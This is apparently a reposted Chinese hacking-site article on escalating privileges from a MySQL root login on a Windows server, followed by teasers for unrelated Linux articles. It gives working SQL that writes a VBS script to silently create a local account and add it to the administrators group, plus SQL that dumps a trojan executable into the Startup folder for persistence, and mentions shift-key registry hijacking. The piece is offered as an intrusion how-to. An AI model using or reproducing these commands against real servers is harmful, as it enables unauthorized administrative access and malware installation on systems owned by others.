|
摘要:本文源自网络,由黑白前线收集整理发布!MYSQL提权我在前面已经写的很明白了,但是还有一些朋友ROOT连接上了,但是无法执行CMD。 无论执行什么都返回:数据库查讯出错,请检查SQL语句create function cmdshell returns string soname 'udf.dll'的语法是否正确。Can't ope... MYSQL提权我在前面已经写的很明白了,但是还有一些朋友ROOT连接上了,但是无法执行CMD。无论执行什么都返回: 数据库查讯出错,请检查SQL语句create function cmdshell returns string soname 'udf.dll'的语法是否正确。Can't open shared library 'udf.dll' (errno: 0 ) //////////////////////////////////// 那么我们在利用服务器组件来进行VBS提权: /////////////////// 构造语句: ///////////////// create table a (cmd text); insert into a values ("set wshshell=createobject (""wscript.shell"") " ); insert into a values ("a=wshshell.run (""cmd.exe /c net user foolishqiang foolishqiang /add"",0) " ); insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators foolishqiang /add"",0) " );
后面我加了一个参数:0,意思为默默的执行。没有任何回显。0表示不弹出CMD窗口,安静的运行。 //////////////////////////////////// 上面的方法一般在加上我以前写的一个MYSQL提权应该能解决提权的问题了。我们也可以以16进制写exe文件 /////////////////////////// create table a (cmd BLOB); insert into a values (CONVERT(木马的16进制代码,CHAR)); select * from a into dumpfile 'C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\启动\foolishqiang.exe' 注意:路径一定要写\\ 俩个 因为要过滤一个\ /////////////////////////////////////////////// 应该说root的总结的差不多了 包括了dll提权。已经导vbs提权。exe提权,Linx Mysql BackDoor提权等。 如果还要深入的话。干点root 还有MIX.DLL。 create table temp_mix(abc longblob); 这个一般用的不是很多。 ///////////////// 我们也可以构造语句,来劫持注册表shift。而不去替换(有保护)。这样也可以进行提权。 Root的提权方法我基本已经都说了。 小菜愚见,大牛不要见笑 (责任编辑:admin) |
这两天和一位朋友,相互研究了一下在IPTABLES中增加新的模块功能。 在网上查了些资料...
Lucid Lynx Ubuntu 10.04操作系统的第三个、也是最后一个Alpha测试版今天新鲜出炉,接...
在经历了 两次跳票以后, Red Hat于2007年3月14日正式发布了RHEL5. RHEL 5将是Red Hat...
备份Linux系统是件非常有挑战性的工作,尤其是对于习惯了Windows系统的存储/备份管理...
yum install vsftp db_utils vi /etc/vsftpd/ftpuser.txt 添加账号 格式如下 zhou 123...
(一)SYN攻击原理 SYN攻击属于DOS攻击的一种,它利用TCP协议缺陷,通过发送大量的半连接...